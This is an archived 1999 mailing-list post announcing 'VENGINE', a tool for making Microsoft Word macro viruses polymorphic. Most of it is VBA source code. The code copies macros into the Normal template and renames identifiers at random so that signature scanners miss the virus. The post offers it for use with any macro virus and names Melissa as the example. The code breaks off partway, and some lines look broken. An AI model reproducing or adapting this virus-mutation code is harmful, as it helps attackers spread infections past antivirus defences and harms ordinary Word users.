VENGINE: Polymorphizer for MS-Word macro viruses

From: Aleph One (aleph1at_private)
Date: Wed Mar 31 1999 - 17:56:43 PST

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    The VENGINE, combined with your favorite Microsoft Word script, produces a
    polymorphic version of that script.  Sorry kiddiez, but you will need
    rudementary VBA skillz to use this.  Instructions are included in the
    vengine.txt file, and an example is given with the ever-so-popular Melissa.
    ' Vengine - polymorphizer for MS-Word macro viruses
    ' Coded by VeggieTailz
    ' This engine can be used to polymorphize any MS-Word macro virus.
    ' The Vengine concept was inspired by Nick FitzGerald's asinine posting
    ' on BugTraq, dated 3/29/99 and archived at
    Private Zy7td() As String
    Private QC2cz() As String
    Private K1j() As String
    Private Nv4cl As String
    Private Sub Example()
      ' As a demo, we'll copy the current macros to the template.  After running
      ' this example (make sure this is the ActiveDocument!), examine the MS-Word
      ' template.  It will contain a scrambled (but still functional) version of
      ' this program.
      Set Source = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
      Set Dest = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
      ' The "Infect" sub copies the macros from "Source" to "Dest", scrambling
      ' them in the process.  The contents of Dest are overwritten.
      Infect Source, Dest
    End Sub
    Private Sub InfectTable()
      ' This table stores the identifiers which will be scrambled.  They can
      ' be any ordinary variable name (even names ending with a suffix like
      ' % or $).  Make your choices carefully tho, as the substitutions
      ' will also be applied to string constants (otherwise the code below
      ' would not get updated).
      ReDim QC2cz(29)  ' don't forget to set the array size!
      QC2cz(1) = "Infect"
      QC2cz(2) = "InfectTable"
      QC2cz(3) = "Zy7td"
      QC2cz(4) = "QC2cz"
      QC2cz(5) = "K1j"
      QC2cz(6) = "Nv4cl"
      QC2cz(7) = "Co6q"
      QC2cz(8) = "X3X"
      QC2cz(9) = "R0e"
      QC2cz(10) = "Tq4tl"
      QC2cz(11) = "G4u"
      QC2cz(12) = "To6dm"
      QC2cz(13) = "Rg4mp"
      QC2cz(14) = "I4h"
      QC2cz(15) = "I6w"
      QC2cz(16) = "Gy0u"
      QC2cz(17) = "S5l"
      QC2cz(18) = "T1g"
      QC2cz(19) = "T1b"
      QC2cz(20) = "Ba6Dk%"
      QC2cz(21) = "X1U%"
      QC2cz(22) = "C6E%"
      QC2cz(23) = "C6z%"
      QC2cz(24) = "X6q"
      QC2cz(25) = "XM2wj"
      QC2cz(26) = "Yx1h"
      QC2cz(27) = "Sh6k"
      QC2cz(28) = "T2w"
      QC2cz(29) = "Ky8c"
      ' [add your entries here!]
    End Sub
    Private Sub Infect(Co6q, X3X)
    ReDim Zy7td(0)
    ReDim QC2cz(0)
    ReDim K1j(0)
    Dim R0e As String
    For I = 1 To Co6q.CountOfLines
    R0e = Co6q.Lines(I, 1)
    If Trim(R0e) <> "" Then T2w R0e, 1
    Next I
    X3X.DeleteLines 1, X3X.CountOfLines
    X3X.AddFromString ""
    For I = 1 To Co6q.CountOfLines
    R0e = Co6q.Lines(I, 1)
    If Trim(R0e) <> "" Then
    Nv4cl = ""
    T2w R0e, 2
    If Rnd < 0.1 Then Nv4cl = Nv4cl + " ' " + "T1b"
    X3X.InsertLines X3X.CountOfLines + 1, Nv4cl
    End If
    Next I
    End Sub
    Private Sub Sh6k(To6dm As String, Rg4mp As Integer)
    G4u = Left$(To6dm, 1) = Chr$(34) And Right$(To6dm, 1) = Chr$(34) And Len(To6dm) > 2
    If G4u Then To6dm = Mid$(To6dm, 2, Len(To6dm) - 2)
    I4h = UCase$(Left$(To6dm, 1)) >= "A" And UCase$(Left$(To6dm, 1)) <= "Z"
    Ky8c = UCase$(Right$(To6dm, 1))
    If Rg4mp = 1 Then
    If I4h Then
    For Ba6Dk% = 1 To UBound(Zy7td)
    If To6dm = Zy7td(Ba6Dk%) Then Exit Sub
    Next Ba6Dk%
    ReDim Preserve Zy7td(UBound(Zy7td) + 1)
    Zy7td(UBound(Zy7td)) = To6dm
    End If
    Exit Sub
    End If
    If I4h Then
    For Ba6Dk% = 1 To UBound(QC2cz)
    If To6dm = QC2cz(Ba6Dk%) Then
    To6dm = K1j(Ba6Dk%)
    If Ky8c < "A" Or Ky8c > "Z" Then To6dm = To6dm + Ky8c
    Exit For
    End If
    Next Ba6Dk%
    End If
    If G4u Then To6dm = Chr$(34) + To6dm + Chr$(34)
    If Nv4cl <> "" Then
    If Right$(Nv4cl, 1) <> "." And Left$(To6dm, 1) <> "." Then To6dm = " " + To6dm
    End If
    Nv4cl = Nv4cl + To6dm
    End Sub
    Private Sub Tq4tl()
    ReDim Preserve K1j(UBound(QC2cz))
    For Ba6Dk% = 1 To UBound(K1j)
    Gy0u = Int(Rnd * 3) + 3
    S5l = ""
    For X1U% = 1 To Gy0u
    T1g = Chr$(97 + Int(Rnd * 26))
    If X1U% = 1 Or Rnd > 0.8 Then T1g = UCase$(T1g)
    If X1U% = 1 + Int(Gy0u / 2) Then T1g = Chr$(48 + Rnd * 9)
    S5l = S5l + T1g
    Next X1U%
    For X1U% = 1 To UBound(Zy7td)
    If S5l = Zy7td(X1U%) Then GoTo I6w
    Next X1U%
    For X1U% = 1 To Ba6Dk% - 1
    If S5l = K1j(X1U%) Then GoTo I6w
    Next X1U%
    K1j(Ba6Dk%) = S5l
    Next Ba6Dk%
    End Sub
    Private Sub T2w(R0e As String, Rg4mp As Integer)
    Dim To6dm As String
    Dim T1g As String
    R0e = LTrim(R0e)
    XM2wj = False
    If Len(R0e) = 0 Then Exit Do
    C6E% = 1
    T1g = UCase$(Left$(R0e, 1))
    X6q = (T1g >= "A" And T1g <= "Z") Or (T1g >= "0" And T1g <= "9")
    If C6E%

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